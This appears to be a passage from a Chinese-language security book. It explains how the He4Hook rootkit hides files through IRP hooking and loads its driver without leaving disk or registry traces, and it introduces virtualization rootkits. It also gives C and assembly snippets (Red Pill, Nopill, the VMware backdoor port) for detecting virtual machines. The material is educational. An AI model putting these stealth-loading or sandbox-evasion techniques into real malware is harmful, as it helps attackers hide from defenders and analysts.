如果所有条件都符合,Rootkit从IRP复制一些感兴趣的数据(例如,请求创建、读取、删除等操作的文件名称)并且调用两个函数TreatmentIrpThread()和TreatmentQueryDirectoryIRP()(或者用于其他所有主要功能的TreatmentCreateObjectIRP())。这两个函数在Rootkit将IRP传递给驱动程序栈中的下一个驱动程序之前对其进行修改。为了隐藏文件,调度例程只要从产生的IRP中删除目录信息,当其他驱动程序接收到该IRP时,信息就丢失了。因此,每当程序调用NtQueryDirectoryFile()或者其他依赖文件系统驱动程序的API时,这些函数都不会返回配置为隐藏的文件。 He4Hook使用的技术依赖一些可能在最近版本的Windows中不存在的未写入文档的函数。因为这些函数未写入文档,所以不能保证在不同的补丁和主发行版本中还会存在。而且,大部分的He4Hook版本在除IRP钩子之外还实施内核函数钩子,可能被扫描SSDT的工具轻易地发现。 He4Hook是一个注重细节的相当成熟的Rootkit,这使其具有非常高的隐蔽性。它的恶意特性在整个源代码中对未写入文档函数的使用(在一个令人印象深刻的,仅有38kB的小型头文件NtoskrnlUndoc.h中)和狡猾的指针重新赋值中显露无遗。它还大量使用预处理指令将某些代码段排除于编译之外。那样,如果Rootkit用户不想要某个功能,该功能就不会出现在所产生的驱动程序中,这就使得所产生的驱动程序中的可疑代码最小化。 He4Hook最隐蔽的特性可能是其装入驱动程序的方法。所有Windows驱动程序必须实现函数DriverEntry(),这个函数代表驱动程序装入时的入口点。所有正常的驱动程序初始化必要的管理结构并且填写驱动程序的主功能表。然而,He4Hook在其DriverEntry()例程内部调用一个函数InstallDriver()。这个函数提取内存中其映像基地址预定偏移量的驱动程序二进制代码,分配一些未分页的核心内存池,并且将驱动程序复制到这个缓冲区,然后调用一个定制函数获得一个未输出的内部函数地址,这个函数在此之后调用“真正的”DriverEntry()例程。 dwFunctionAddr=(DRIVER_ENTRY)NativeGetProcAddress((DWORD)pNewDriver- Place,"__InvisibleDriverEntry@8"); if(!dwFunctionAddr){ ExFreePool(pNewDriverPlace); return FALSE; } NtStatus=dwFunctionAddr(DriverObject,RegistryPath); 未输出的函数__InvisibleDriverEntry是InstallDriver()中实际的DriverEntry()例程,在将其指针赋值给dwFunctionAddr后理解调用。这种技术有两个主要的好处:(1)驱动程序不由服务控制管理器(SCM)装入,因此不存在磁盘或者注册表上的痕迹。(2)函数重定向帮助掩盖其真正的功能,而不是在众所周知的驱动程序(如DriverEntry())中那样广而告之。 4.5.6 Honeynet项目创建的Sebek 技术:IRP钩子,SSDT钩子,过滤器/分层驱动程序以及DKOM 有一点不得不提,并不是所有内核模式的Rootkit都是为了“罪恶”或者敌意的目的而编写的。Sebek由本书作者之一Michael A.Davis为Honeynet项目编写,是一个使用与恶意Rootkit相同技术的内核模式Rootkit,帮助分析、检测和捕捉进入蜜罐的攻击者信息。Sebek使用了各种技术来避免攻击者发现,并且确保能够将捕捉到的信息以秘密的方式发送给远程的sebek服务器。 因为Honeynet项目的目标是“学习计算机和网络攻击所涉及的工具、策略和动机,并分享所得到的教训”,sebek用来监控和捕捉攻击者进入Windows系统之后的击键和执行的功能。监控所有Windows的必要部分来获得这些信息暴露了一个有趣的问题。已经存在的主流击键记录程序的工作方式是挂钩键盘并且使用本章前面谈到的方法。但是这些方法很容易被发现,对攻击者保持隐蔽性很重要,因为我们不希望测试的目标(攻击者)由于知道了自己被监视而改变其行为。所以,我们决定使用和其他内核Rootkit相同的技术(具体地说就是SSDT钩子和过滤器驱动程序)在内核中实现一组函数,以捕捉对注册表键值、文件以及所有发送给基于控制台的应用程序的命令和击键。 当sebek第一次发行时,没有引起任何人的注意,但是自从该工具的源代码可以免费取得之后,其他人开始在自己的项目中利用这些代码。Rootkits.com上张贴了消息,第二和第三个版本的sebek for Windows添加了新的功能,包括监视和挂钩所有入站和出站TCP/IP连接以及更多的GUI钩子。sebek收集的信息对于分析进入基于Windows的蜜罐的攻击者已经没有价值了。令人难过地是,由于社区对此缺乏兴趣以及作者缺乏时间,sebek for Windows已经超过两年没有更新了。 sebek不是唯一的“友好”Rootkit。许多击键记录程序、数据记录程序甚至防恶意软件和防病毒软件都采用内核模式Rootkit来保持隐蔽和检测恶意软件。好人使用同样的工具和技术,这就是意图是工具、驱动程序和软件成为恶意软件的主因的一个重要范例。这是每一个主流安全型供应商所面对的问题,我们将在第7章讨论防病毒业界及其对Rootkit和恶意软件的回应时进一步研究这个问题。 4.6 小结 内核模式Rootkit技术从根本上基于复杂的指令集体系结构和Windows OS所基于的内核模式体系结构。仅仅理解和考虑这些技术的大量细节对于防Rootkit的领导者来说就是难以完成的任务。内核模式始终会有一个后门,这是因为Windows OS设计和实现的巨大复杂性。 内核模式Rootkit是当今最先进和最有持续性的网络威胁。它们继续成为基本系统保障的可怕对手,并且远远领先于商业的防病毒软件和HIPS产品。 本章的最后展示了内核模式Rootkit的一些例子,透彻地说明了本书第一部分讨论的技术。我们要向读者强调,这只是一小部分例子,而且仅包括已经广为人知并且经过研究的Rootkit。更高级的Rootkit当然还存在于未公开的其他空间内。这甚至包括比操作系统更深的系统,如固件和BIOS级别的Rootkit。而且,由单独工具使用的技术也开始集合在一起,这样单个Rootkit最终会利用越来越多的钩子方法来减少曝光的可能性。 最后,并不是所有内核模式Rootkit都是魔鬼!我们了解到,其他工具如sebek、防病毒软件和集团公司使用的企业级击键记录程序都采用了和恶意的内核Rootkit相同的“控制”技术来发现Rootkit。 对策小结 现在广泛得到接受的恶意软件分级系统是由业界公认的研究人员Joanna Rutkowska在Black Hat Europe 2006会议上提出的(http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Rutkowska.pdf),包括4种类型的恶意软件: ·0类 不修改操作系统或者其他进程的恶意软件。 ·Ⅰ类 修改被批准修改的系统代码(也就是操作系统本身、CPU寄存器等)之外的,不应该被修改的内容的恶意软件。 ·Ⅱ类 修改设计为可修改的内容(例如,二进制文件中数据段内的自修改代码)的恶意软件。 ·Ⅲ类 可以不做任何修改就破坏操作系统的虚拟Rootkit。 为了与这些恶意软件做斗争,Joanna推荐了多种可用的方法和工具,以及恶意软件实例。下表详细列出了这些对策。 第5章 虚拟Rootkit 虚拟技术在现在的网络基础结构中不断地流行起来,因此,虚拟Rootkit代表着尖端的Rootkit技术。虚拟化的硬件和软件支持在近年来已经迅猛地增强了,为全新的Rootkit攻击方向铺平了道路。实现虚拟化的技术机制也为以过去不可能的隐蔽方法造成破坏提供了支持。更糟的是,虚拟技术可能极其复杂和难以理解,这为有关这种威胁的用户培训带来了挑战。可以说,虚拟化技术当前的状态是一次完美风暴。 为了更好地理解虚拟Rootkit的威胁,我们将介绍虚拟技术工作原理的大量技术细节中的一些内容,以及虚拟技术所针对的最重要部分。这些主题包括虚拟化策略、虚拟内存管理以及系统管理程序。在介绍这些技术细节之后,我们将讨论各种虚拟Rootkit技术,例如,离开虚拟环境甚至劫持系统管理程序。在本章最后,我们将深入分析3种当前有名的虚拟Rootkit:SubVirt、Blue Pill和Vitriol。 5.1 虚拟机技术概述 虚拟技术重新定义了现代的服务器和工作站计算。虚拟化使单个计算机能够在多个同时执行的操作系统之间共享资源。在虚拟化出现之前,一台计算机被限制为只能同时运行一个操作系统实例(除非将大型机作为虚拟化的第一个实例)。这种限制是对资源的浪费,因为底层的体系结构能够同时支持多个操作系统实例。这种并行处理和资源共享的一个明显好处是在服务器环境(如Web和文件服务器)中提供了高生产率。因为系统管理员现在可以在一台计算机上运行多个Web服务器,可以使用更少的资源来完成更多的工作。虚拟化市场还扩展到单用户的个人计算机,使它们能够在多种不同类型的操作系统(Linux、OSX等)中完成多种任务。图5-1说明了系统资源虚拟化以运行多个操作系统的概念。 有两种得到广泛接受的虚拟机分类:进程虚拟机和系统虚拟机(也称作硬件虚拟机)。我们将对进程处理器做简单的介绍,而主要关注于系统虚拟机。 图 5-1 系统资源的虚拟化 5.1.1 虚拟机类型 进程虚拟机也称应用程序虚拟机,一般安装在一个OS上并且虚拟地支持一个单独的进程。进程虚拟机的一个例子是Java虚拟机和.NET Framwork。这种类型的虚拟机(VM)为运行中的进程提供一个执行环境(常常被称作沙箱),代表这个进程使用和管理系统资源。 进程虚拟机在设计上远远简单于第二种虚拟机技术的主要类型——硬件虚拟机。硬件虚拟机不仅为单个进程提供执行环境,还提供多个操作系统(称作客户操作系统)同时使用的低级硬件仿真。这意味着VM模拟x86体系结构,提供所有预期的硬件和汇编指令。这种仿真或者虚拟可以在“裸金属”硬件(即在CPU芯片上)或者当前运行的操作系统(称作主操作系统)之上用软件来实现。这种仿真的操纵者被称为系统管理程序(hypervisor),或称虚拟机管理器(virtual machine manager,VMM)。 5.1.2 系统管理程序 系统管理程序(hypervisor)是一个处理所有在主系统上运行的虚拟机的系统级虚拟化的硬件虚拟机组件。它管理从操作系统资源到共享系统资源之间的映射。系统管理程序处理系统资源共享、虚拟机隔离,以及所有附属虚拟机的核心任务。系统虚拟机内部的每个虚拟机运行一个完整的操作系统,例如Windows Vista或者Red Hat Enterprise Linux。 有两种类型的系统管理程序:Ⅰ类(原生)和Ⅱ类(托管)。I类系统管理程序在主板上的系统硬件中实现,而Ⅱ类系统管理程序由主操作系统之上的软件实现。从图5-2中可以看到,Ⅱ类系统管理程序具有与操作系统同级别的内核模式组件,这些组件负责将虚拟机与主操作系统隔离。这些系统管理程序提供硬件仿真服务,所以虚拟机认为自己直接使用物理硬件。Ⅱ类系统管理程序包括Xen ESX Server、VMWare Workstation和Sun VirtualBox等著名产品。 Ⅰ类系统管理程序如图5-3中所示,运作于操作系统之下的一个特殊特权级别Ring 1。这种系统管理程序的另一个名称为裸金属系统管理程序(bare-metal hypervisors,),这是因为它们依赖于制造商在硬件中提供的虚拟化支持(以特殊的寄存器及电路的方式)以及CPU中的特殊指令。Ⅰ类系统管理程序一般速度更快,这是因为虚拟化支持嵌入到硬件中。Ⅰ类系统管理程序的例子包括AMD-V/Pacifica、Intel VT-x和UltraSPARC T1。图5-3是Ⅰ类硬件管理程序的总体图解。 图 5-2 Ⅱ类系统管理程序 图 5-3 Ⅰ类系统管理程序 这不能代表所有的I类系统管理程序实现,因为具体的供应商解决方案都需要几十张图解。 Ⅰ类系统管理程序的总体思路是压缩保护层次,这样子虚拟机可以像主虚拟机一样在硬件之上运行。虚拟机隔离和系统完整性由系统管理程序和主虚拟机之间的特殊通信维护。如图5-3所示,系统管理程序由来自Intel或者AMD的硬件级别虚拟化支持提供支撑环境。 系统管理程序是虚拟技术中最重要的组件。它运行于所有单独的客户操作系统之下,确保系统的完整性。系统管理程序必须维持客户操作系统认为自己与系统硬件直接交互的假象。这种需求对虚拟技术来说是关键性的,也是计算机安全界中许多论战的根源。 围绕系统管理程序无法保持对附属操作系统的透明和隔离的问题已经激起了很多争论。现在,计算机安全社区已经广泛地接受了系统管理程序可能无法保持完整的虚拟假象,客户操作系统(或者安装的应用程序)始终能够确定自己是否处于虚拟环境中的现实。尽管AMD和Intel努力提供具有更好地躲避研究团体发布的检测技术能力(例如定时攻击和专门的CPU指令)的系统管理程序,但是前述的事实仍未改变。 5.1.3 虚拟化策略 当今的虚拟化技术所使用的虚拟化策略主要有3种。这些策略在与操作系统和底层硬件的集成方面有根本的不同。 第一种策略被称为虚拟机仿真,要求系统管理程序仿真真实和虚拟的硬件供客户操作系统使用。系统管理程序负责将客户操作系统所能访问的虚拟硬件“映射”到计算机上安装的真实硬件。仿真的关键要求是确保必要的特权级可用并且在客户操作系统必须使用CPU特权指令时进行验证,这种仲裁由系统管理程序处理。使用仿真技术的产品包括VMWare、Bochs、Parallels、QEMU和Microsoft Virtual。这种技术的关键点在于要求系统管理程序“愚弄”客户操作系统,使其以为正在使用真实硬件。 第二种策略被称为半虚拟化(paravirtualitation)。这种策略依赖修改客户操作系统对虚拟化提供内部支持。这样就不需要系统管理程序对特殊的CPU指令进行“仲裁”,也不需要“愚弄”客户操作系统。实际上,客户操作系统知道它们正处于虚拟环境中,因为它们正在协助虚拟化进程。实现这一策略的流行产品之一是Xen。 最后一种策略是OS级虚拟化,这种策略中操作系统完全管理隔离和虚拟化,实际上它建立了本身的多个副本并且互相隔离。这种技术的最佳范例是Sun Solaris zones。 理解这3种策略对于体会虚拟Rootkit如何利用每种实现策略的复杂性来说是重要的。记住,这些策略只是流行的虚拟化策略。在商业界、研究团体和政府机构中还存在许多其他的策略。每种实现都为虚拟战线带来自己独特的优点和弱点。 5.1.4 虚拟内存管理 系统管理程序负责将物理硬件抽象为虚拟的可用硬件的一个重要实例是虚拟内存管理。虚拟内存不是虚拟化中独有的概念。所有现代操作系统都利用物理内存到虚拟内存的抽象,这样做系统能够支持可伸缩的多进程(一次运行多个进程)。例如,所有运行在32位的非PAEWindows NT平台上的进程都得到2GB的虚拟内存。但是,系统可能只安装了512MB物理RAM。为了使这种“超额使用”成为可能,操作系统的内存管理器与写入磁盘的一个硬件文件协同,将进程的虚拟地址空间翻译为物理地址。同样的,系统管理程序必须将客户操作系统使用的底层物理地址转换为硬件中的实际物理地址。因此,管理内存时就需要一个附加的抽象层。 虚拟内存管理器是虚拟化设计的一个关键组件,不同的供应商采用不同的方法来管理系统内存。VMWare将主操作系统的内存地址空间与属于客户操作系统的分开,这样客户操作系统不可能接触到主操作系统中的地址。其他的解决方案则采用硬件和软件解决方案相结合的方法来管理内存分配。最后,这些解决方案只能有限地防御能够危害客户和主操作系统之间隔离的高级Rootkit。 5.1.5 虚拟机隔离 系统管理程序的另一个关键职责是使客户操作系统相互隔离。一个虚拟机使用的任何文件或者内存空间都不应该可见于任何其他虚拟机。用于完成这一分隔的技术和组件统称为虚拟机隔离。系统管理程序运行于所有客户操作系统之下及/或裸硬件之上,所以它能够拦截对系统资源的请求并且控制可见性。虚拟内存管理和I/O请求中介对于隔离VM是必要的,指令集仿真和特权扩大控制(例如SYSENTER,调用门等)也是如此。VM隔离还隐含了客户操作系统与主操作系统的隔离。这种分离对于集成性、稳定性和性能都是关键的,结果是虚拟技术相当擅长于单独客户操作系统之间的保护。你很快就会看到,在底层的主操作系统与从属的客户操作系统之间的保护就不是如此。前面已经提到过,业界中已经普遍接受了一个事实,虚拟技术不能维持“真实世界”和“虚拟世界”之间的界线。 5.2 虚拟机Rootkit技术 现在我们将把焦点从虚拟化技术转移到3种虚拟Rootkit如何利用这一技术上来。首先,让我们简单地回顾一下历史,看看恶意软件在这方面是如何发展的。 5.2.1 矩阵里的Rootkit:我们是怎么到这里的 虚拟技术已经成为了全新一代的恶意软件和Rootkit的分水岭。在第4章中,我们介绍了Joanna Rutkowska定义的恶意软件分类。为了便于展开恶意软件和Rootkit发展的讨论并且抵御这些威胁,我们将使用Joanna的模型所描述的4种恶意软件的成熟度水平,将其应用到Rootkit: ·0类/用户模式Rootkit 不成熟。 ·Ⅰ类/静态内核模式Rootkit 较为成熟但是容易发现。 ·Ⅱ类/动态内核模式Rootkit 成熟但是始终处于与检测程序相同的水平。 ·Ⅲ类/虚拟Rootkit 高度成熟并且不断演变。 我们看到Rootkit和恶意软件的总体趋势(也为刚才所描述的恶意软件分类所证明)是随着技术变得更加成熟,进攻和防御的安全度量也都有了发展。这意味着,防御者为了发现Rootkit需要更加努力地工作,而Rootkit创作者也必须更加努力地编写更成熟的Rootkit。这种战斗造成的部分结果是技术集合中不断增长的复杂性(也就是虚拟化),这也是恶意软件创作者和计算机防御人员之间不断斗争的直接结果。在分类中,每种类型的恶意软件可以看做一代恶意软件,它们需要找更好的传染方法以获得成长。目前尖端的Rootkit创作和检测技术就是虚拟化。 斗争还在持续,Rootkit扩大到虚拟世界和人类为真正察觉虚拟Rootkit的努力与电影《黑客帝国》中的情节类似。2006年,Joanna Rutkowska发布了一个名为Blue Pill的虚拟Rootkit。这个Rootkit得名于电影中的蓝色药片(blue pill),这是影片中当Neo面临重新进入矩阵(保持对现实世界的无知)或者服下红色药片离开虚拟世界进入真实世界的选择时,Morpheus所提供的(Joanna还发布了一个发现虚拟环境的工具,恰当地命名为Red Pill)。与电影的情节类似,受害的操作系统“吞服了蓝色药片”(也就是虚拟Rootkit),现在处于“矩阵”之中,这是受到虚拟机控制的世界。相应地,Red Pill能够发现虚拟环境;但是这个类比还有不足之处,因为这个工具不能使OS离开VM(就像红色药片使Neo离开矩阵那样)。 虚拟化的安全含义已经经过了一段时间的研究,Joanna的研究向主流的研究团体提出了问题,在此之后已经发布了许多工具和研究报告。 5.2.2 什么是虚拟Rootkit 虚拟Rootkit是专门为虚拟环境编码和设计的Rootkit。它的目标与我们在本书中已经讨论过的传统Rootkit相同(也就是使用隐蔽的手段在机器上存续),其组件也大体相同,但是技术完全不同。主要的不同在于这种Rootkit的目标已经从直接修改操作系统转移到在虚拟环境中透明地破坏系统。简而言之,虚拟Rootkit包含检测和选择性地离开虚拟环境的功能(如果它不属于客户VM),同样也能通过在虚拟环境之下安装恶意的系统管理程序,完全劫持原生(主)操作系统。 虚拟Rootkit将战场从操作系统的同一级别转移到操作系统之下的级别(因此,它是前面讨论过的4类恶意软件)。传统的Rootkit必须确定隐蔽地在不为人知的情况下(并且不触发第三方检测工具)修改操作系统的方式,而虚拟Rootkit在完全不必触及操作系统的情况下达到了目的,它利用了软件和硬件的虚拟化支持将自身插入操作系统之下。 5.2.3 虚拟Rootkit的类型 从本书的目的出发,我们将定义3种虚拟Rootkit类型(最后两种定义已经为安全社区中的其他研究人员所定义): ·虚拟感知恶意软件(Virtualization-aware malware,VAM) 这是你所常见的恶意软件,增加了检测虚拟环境,从而有不同的表现(终止、暂停)或者攻击VM本身。 ·基于虚拟机的Rootkit(VMBR) 这是一种传统类型的Rootkit,具备在不为人知的情况下在虚拟机内部封装原生OS的能力,这种能力通过修改现有的虚拟化软件来得到。 ·系统管理程序虚拟机(Hypervisor virtual machine,HVM)Rootkit 这种Rootkit利用硬件虚拟化支持,用定制的系统管理程序完全替代底层系统管理程序,然后在运行中封装当前运行的操作系统(主操作系统和客户操作系统)。 虚拟感知恶意软件更多的是个令人烦恼的东西而不是真正的威胁。这种类型的恶意软件只是在检测到虚拟环境时改变自己的行为,例如,终止自己的进程或者暂停执行,就像没有恶意的目的一样。许多常见的病毒、蠕虫和木马都可以归入这个类别。这种多态行为的目标主要是欺骗使用虚拟环境作为沙箱来分析恶意软件的分析人员。通过在检测到虚拟机时无害的表现,这种恶意软件能够躲避未起疑心的分析人员。使用调试程序可以轻松地战胜这种技术,因为分析人员能够禁用这种多态行为,并发现恶意软件的真正功能。蜜罐也常常用作沙箱来分析恶意软件以及浓缩运行多个“轻量级”的VM所需的资源;因此,虚拟感知的恶意软件也常常有意无意地将它们作为目标。 VMBR最先由Tal Garfinkel、Keith Adams,、Andrew Warfield和Jason Franklin在斯坦福大学定义(http://www.cs.cmu.edu/~jfrankli/hotos07/vmm_detection_hotos07.pdf),包含能够通过修改系统自举顺序指向Rootkit的系统管理程序将主OS移入VM,系统管理程序由目标OS中的一个秘密的内核驱动程序装入。本书中举出的例子是SubVirt,它需要一个修改过的VMWare或者Virtual PC版本才能运行。操作系统本身——Windows XP和Linux——也做了修改以建立这个概念验证性的Rootkit。VMBR在设计和功能上比VAM更成熟,但是仍然缺乏HVM Rootkit的自治能力和超强的隐蔽性,它还存在着由于原生的x86体系结构中缺乏完全虚拟化所致的固有缺陷。这意味着很多CPU指令(sgdt、sidt、sldt、popf、mov等)不会被系统管理程序所捕捉,可以在用户模式中执行这些指令以检测VMBR。因为这些指令没有被Interl看做是特权指令,CPU不会为这些有问题的指令设置陷阱。因此,仿真软件(如VMBR)也就不能拦截这些可能揭露VMBR存在的指令。 HVM Rootkit是现在已知的最高级的虚拟Rootkit。它们能够安装一个定制的超轻量级系统管理程序,这个程序能在运行中(也就是说,对OS本身是透明的)在VM中寄生一个原生OS,而且这种行为极其隐蔽。HVM虚拟Rootkit依赖AMD和Interl所提供的硬件虚拟化支持来达到它的目标。硬件支持以软件(例如OS或者HVM Rootkit)所能运行的附加CPU级别指令的形式提供,这些指令能够快速而有效地安装一个系统管理程序,并且在隔离的虚拟环境中运行客户操作系统。 在安全团体中争论的要点是主操作系统(或者底层系统管理程序)能否发现这个子版本(或者检测是否与将来可能被虚拟化的所有系统相关)。现在,我们来讨论虚拟恶意软件如何检测和离开虚拟环境。 5.2.4 检测虚拟环境 检测虚拟环境是恶意软件和恶意软件检测程序的重要功能。想象一下:如果你在“矩阵”当中,你不想知道吗?如果你知道有人在秘密地监视着你的一举一动,就可能会重新思考你的行动。 注意:本章中的危险等级粗略估计了所讨论的技术用于实际的恶意软件的可能性,即使该技术本身(例如VM脱逃)实际上可能不是一种攻击。因为虚拟Rootkit不太常见,所以危险等级非常低。 检测VM的产物 因为虚拟机使用系统资源,所以它们在系统的各处留下表明其存在的痕迹。“挫败虚拟机检测”一文(http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf)的作者描述了4个检查虚拟环境标志的区域: ·进程、文件系统和注册表中的产物,例如VMWare系统管理程序进程。 ·系统内存中的产物。内存中通常装入到某个位置的OS结构在虚拟化时可能被装入到不同的位置;内存中存在表示虚拟管理程序正在运行的字符串。 ·虚拟机使用的虚拟硬件的存在,例如VMWare的虚拟网卡和USB驱动器。 ·专用于虚拟化的CPU指令,例如为增加虚拟性能所添加的非标准x86指令,如Intel VT-x的VMXON/VMXOFF。 搜索这些产物,恶意软件和VM检测程序都能发现自己处于虚拟环境中。 VM异常和透明性 尽管检测方法有用,但是深究之下,根本的问题是虚拟机无法做到透明。虚拟化技术的根本目标是透明地仿真底层硬件。换句话说,客户操作系统应该不会因为性能和抽象的原因而意识到自己处于虚拟环境之中。但是,虽然透明性是一个性能目标,但是达到足够好的透明性(例如性能不会因为仿真而受到影响)也仅仅是一个目标。换句话说,虚拟机从未计划,也可能无法达到完全透明。 这里还有个问题:因为虚拟化技术本身是可检测的,任何使用或者依靠这种技术的恶意软件或者检测工具对其对手来说也都是可检测的,这对于检测程序和恶意软件来说是个双输的局面。如果检测程序使用VM分析恶意软件,那么恶意软件总是会发现自己在VM中;同样,如果虚拟Rootkit试图通过安装自己的系统管理程序在虚拟环境中为主操作系统设置陷阱,主OS也总是可以发现这一变化。 那么什么是虚拟环境的底层标志呢?许多标志与设计问题相关——例如如何仿真某条CPU指令——但是大部分都是系统管理程序作为“真实硬件”和“虚拟硬件”之间的代理所固有的物理限制和性能问题的产物。 Garfinkel等人在《Compatibility Is Not Transparency:VMM Detection Myths and Realities》(兼容性不是透明性:VMM检测的神话和现实)(http://handlers.sans.org/tliston/Thwarting VMDetection_Liston_Skoudis.pdf)一文中提供了对这种虚拟化异常的非常好的总结——逻辑差异、资源差异和定时差异。 逻辑差异是CPU制造商(Intel,AMD等)的真正x86指令集与虚拟化提供商如VMware或者Virtual PC之间的实现差异。这种差异很简单:为了仿真硬件,VMWare和Microsoft这类公司必须“推倒重来”,但是它们不是总能沿着正确的道路前进,而是用不同的途径达到目的。因此,区别它们的实现和真正的x86支持并不困难。目前VM仿真x86 SIDT指令的局限性就是一个例子。 资源差异在虚拟环境中很明显,这是因为虚拟机和系统管理程序本身必须消耗资源。这些差异主要表现在CPU缓存、主内存以及硬盘空间。常用的一种VM检测技术包含了对非虚拟化环境的存储需求的基准测试,使用所有与基准的背离来作为虚拟环境的标志。 对于第三种VM异常——时间差异也可以利用相同的技术。在非虚拟化操作的约束下,某些系统指令的执行时间是可以预测的。在仿真的时候,这些相同的指令花费的时间要稍微长一些,而这种差异很容易检测到。前面提到的Garfinkel等人的文章中有一个例子,由于系统管理程序的虚拟内存管理器处理不断增加的页面错误,所以系统性能有根本性的问题。这些页面错误就是虚拟机实施像VM隔离(就是保证主操作系统与客户操作系统的内存空间不互相影响)这类的重要特性时的管理开销的直接结果。有一种用于检测VM的时间攻击方法就涉及了并行执行两条x86指令(CPUID和NOP),在一段时间内度量执行时间的差异。大部分VM技术会有可以预测的差异范围,而非虚拟化环境则没有差异。 现在我们将研究一些可用于检测虚拟环境存在的工具。除非另作说明,否则这些工具只能检测VMWare和Virtual PC。VM检测方法的更全面列表包括Parallels、Bochs、Hydra以及其他许多种方法,可以参见http://www.symantec.com/avcenter/reference/Virtual_Machine_Threats.pdf。 Joanna Rutkowska所创建的Red Pill:使用SIDT的逻辑差异异常 在VMWare和“真实”主机内部测试SuckIt Rootkit中观察到一些异常之后,Red Pill由Joanna Rutkowska于2004年发布(http://www.invisiblethings.org/papers/redpill.html)。事实是,这个Rootkit(与IDT挂钩)在VMWare中无法装入,这归咎于VMWare对SIDT指令(存储IDT)的处理方式。因为一个VM中能够运行多个操作系统,而发出SIDT时只有一个IDT寄存器能够存储IDT,所以VM必须将IDT交换出去,将其中一个IDT存储在内存中。尽管这破坏了Rootkit的功能,但是却偶然地揭示了VM中许多古怪现象中的一种,这种现象使VM很容易检测;Red Pill也就应运而生。 Red Pill在VM中发出SIDT指令并且测试返回的IDT地址,并与Virtual PC和VMWare Workstation中的已知值相比。根据返回值,Red Pill能够检测是否在VM内部。下列代码完全使用C语言编程: #include<stdio.h> int main(){ unsigned char m[2+4],rpill[]="\x0f\x01\x0d\x00\x00\x00\x00\xc3"; *((unsigned*)&rpill[3])=(unsigned)m; ((void(*)())&rpill)(); printf("idt base:%#x\n",*((unsigned*)&m[2])); if(m[5]>0xd0) printf("Inside Matrix!\n",m[5]); else printf("Not in Matrix.\n"); return 0; } 注意,SIDT指令以十六进制操作码(CPU指令和操作数的字节表示)的形式包含在源代码中,以增加其可移植性。为了使编译器为你生成这些操作码,只要使用内联汇编代码(例如,MOV eax,4)来代替操作码就可以了。 Danny Quist和Val Smith(Offensive Computing)创建的Nopill:使用SLDT的逻辑差异 Red Pill发布后不久,Offensive Computing的两位研究人员注意到它所采用的方法有重大的局限性,进而发布了白皮书以及改进的概念验证代码Nopill(http://www.offensivecomputing.net/files/active/0/vm.pdf)。这一局限性就是SIDT方法在多核以及多处理器的系统上会失败,因为每个处理器都有一个IDT,生成的字节特征码可能剧烈变化(从而使Red Pill使用的硬编码值变得不可靠)。Red Pill对于非虚拟化的多处理系统也会遇到假阳性的情况。 这两位研究人员的改进方法是使用x86局部描述符表(LDT),这是一个与进程相关的用于内存访问保护的数据结构,目标与IDT相同。通过发出SLDT指令,Nopill能够更可靠地在多处理器系统上检测VM。Nopill使用的特征码是根据Windows OS不利用LDT(所以其位置将是0x00)以及GDT结构这一事实,而VMWare无论如何都必须为LDT和GDT提供虚拟支持的事实。因此,每个结构的位置在虚拟化系统和非虚拟化系统上都会有可预测的变化。Nopill的代码如下: #include<stdio.h> inline int idtCheck(){ unsigned char m[6]; __asm sidt m; printf("IDTR:%2.2x%2.2x%2.2x%2.2x%2.2x%2.2x\n",m[0],m[1],m[2], m[3],m[4],m[5]); return(m[5]>0xd0)?1:0; } int gdtCheck(){ unsigned char m[6]; __asm sgdt m; printf("GDTR:%2.2x%2.2x%2.2x%2.2x%2.2x%2.2x\n",m[0],m[1],m[2], m[3],m[4],m[5]); return(m[5]>0xd0)?1:0; } int ldtCheck(){ unsigned char m[6]; __asm sldt m; printf("LDTR:%2.2x%2.2x%2.2x%2.2x%2.2x%2.2x\n",m[0],m[1],m[2], m[3],m[4],m[5]); return(m[0]!=0x00&&m[1]!=0x00)?1:0; } int main(int argc,char*argv[]){ idtCheck(); gdtCheck(); if(ldtCheck()) printf("Virtual Machine detected.\n"); else printf("Native machine detected.\n"); return 0; } 如源代码中所示,Nopill实际上读取所有的IDT、GDT和LDT结构,但是仅将LDT作为VM检测的依据。对于IDT和GDT结构,Nopill发出相关的x86指令将该表的信息存储在一个内存位置(SIDT或者SGDT)上,然后检查生成的表格地址以了解这个地址是否大于魔法地址位置0xd0(虚拟环境中可预测的重定位表格位置)。然后读取LDT确定代码是否在VM中运行。如果两个项目中LDT的地址都不是0x00,那么VM肯定重定位了这个表格,因为Windows不使用LDT(因此地址为0x00)。 Tobias Klein(Trapkit)所创建的ScoopyNG:资源和逻辑差异 从2006年以来,Trapkit.de网站的Tobias Klein发行了一系列测试各种检测方法的工具。这些工具——Scoopy、Scoopy Doo和Jerry在2008年整合为一个单独工具Scoopy NG。 Scoopy Doo最早通过搜索已知的VMWare分配的MAC地址和其他虚拟硬件来寻找VMWare虚拟环境中的基本资源差异。但是,这被证明不如汇编级的技术可靠,因此这个产品终止了。 Scoopy NG工具使用7个不同的测试(来自多个研究人员)确定代码是否运行于VM之中。它在单处理器和多处理器系统上检测VMWare VM,使用如下的技术: ·测试1 如果IDT基地址在已知位置说明在VM之中。 ·测试2 如果LDT基地址不是0x00说明在VM之中。 ·测试3 如果GDT基地址在已知位置说明在VM之中。 ·测试4 如果STR MEM指令返回0x00、0x40说明在VM之中。 ·测试5 如果特殊汇编指令0x0a(version)返回VMWare魔法值0x564D5868(VMXh的ASCII码)说明在VM之中。 ·测试6 如果特殊汇编指令0x14(memsize)返回VMWare魔法值0x564D5868(VMXh的ASCII码)说明在VM之中。 ·测试7 如果异常测试触发VMWare的一个缺陷说明在VM之中。 测试1~测试3是人所共知的,前面已经做了介绍。测试4根据S21Sec的Alfredo Andres Omella在2006年的研究(http://www.s21sec.com/descargas/vmware-eng.pdf)。这个测试发出一个存储任务寄存器(STR)x86指令,并且检查任务段选择器的返回值。Alfredo注意到返回值与非虚拟化环境中的不同。虽然这个检查无法移植到多核和多处理器环境,但是也是成长中的揭示实现缺陷的汇编指令列表中的新成员。 测试5和测试6是根据Ken Kato(http://chitchat.at.infoseek.co.jp/vmware/backdoor.html)对VMWare使用的允许客户和主操作系统互相通信(也就是复制和粘贴)的“I/O后门”的研究。记住,这些端口不是真实的,而是虚拟端口。0x5658就是这样一个端口。在下面的代码中,使用各种参数查询这个端口,并将结果和已知的魔法值(就是标志产品存在的特殊值)比较: mov eax,'VMXh'//VMware magic value(0x564D5868) mov ecx,14h//get memory size command(0x14) mov dx,'VX'//special VMware I/O port(0x5658) in eax,dx//special I/O 